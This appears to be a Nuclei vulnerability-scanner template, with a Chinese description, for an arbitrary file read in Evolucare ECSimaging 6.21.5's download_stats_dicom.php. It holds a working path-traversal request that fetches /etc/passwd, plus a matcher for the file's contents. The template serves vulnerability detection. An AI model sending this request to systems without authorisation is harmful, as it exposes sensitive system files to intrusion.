id: evolucare-ecsimaging-file-download

info:
  name: Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞
  author: xc
  severity: high
  description: |
    Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.漏洞影响:EVOLUCARE Evolucare Ecsimaging 6.21.5
    body="ECSimaging"


http:
  - raw:
      - |
        GET /download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd HTTP/1.1
        Host: {{Hostname}}
      
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && regex('root:.*:0', body_1)"
        condition: and
